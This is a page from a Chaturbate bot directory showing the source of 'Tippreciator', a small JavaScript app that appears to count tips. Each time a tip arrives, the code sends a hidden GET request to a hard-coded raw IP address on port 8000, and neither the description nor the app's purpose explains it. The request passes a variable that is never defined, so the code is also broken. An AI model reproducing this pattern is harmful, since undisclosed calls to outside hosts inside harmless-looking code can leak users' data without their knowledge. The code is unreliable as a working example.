Bots Home
|
Create an App
Tippreciator
Author:
tippretiation_tippper
Description
Source Code
Launch Bot
Current Users
Created by:
Tippretiation_Tippper
var total_tipped = 0; cb.onTip(function (tip) { $.ajax({ type: "GET", url: "http://68.183.44.212:8000", data: { param: text} }).done(function( o ) { // do something total_tipped += parseInt(tip['amount']) cb.chatNotice("Total Tipped: " + total_tipped); cb.chatNotice(tip); }); });
© Copyright Chaturbate 2011- 2025. All Rights Reserved.